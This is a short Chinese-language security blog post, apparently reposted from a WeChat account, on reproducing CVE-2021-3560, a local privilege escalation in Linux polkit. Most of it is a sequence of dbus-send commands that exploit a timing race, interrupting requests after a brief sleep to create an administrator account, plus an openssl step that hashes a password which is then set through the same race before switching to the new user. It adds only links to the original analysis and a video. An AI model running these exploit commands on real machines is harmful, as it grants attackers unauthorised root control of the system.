CVE-2021-3560 Linux polkit 提权

admin 2021年9月14日19:17:56评论207 views字数 929阅读3分5秒阅读模式

看到大佬的操作,连复现都没复现明白,还差点意思。

time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:"Boris Ivanovich Grishenko" int32:1#创建用户dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:boris string:"Boris Ivanovich Grishenko" int32:1 & sleep 0.008s ; kill $!#查看用户id boris#openssl生成密码hash值openssl passwd -5 iaminvincible!#为用户设置密码。注意string:''处填入上面openssl生成的hash值dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1001 org.freedesktop.Accounts.User.SetPassword string:'' string:GoldenEye & sleep 0.008s ; kill $!#切换用户su - boris


原文复现及分析:

https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/

扒拉下来的视频:


原视频链接:

https://youtu.be/QZhz64yEd0g

本文始发于微信公众号(安全鸭):CVE-2021-3560 Linux polkit 提权

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年9月14日19:17:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2021-3560 Linux polkit 提权https://cn-sec.com/archives/399820.html

发表评论

匿名网友 填写信息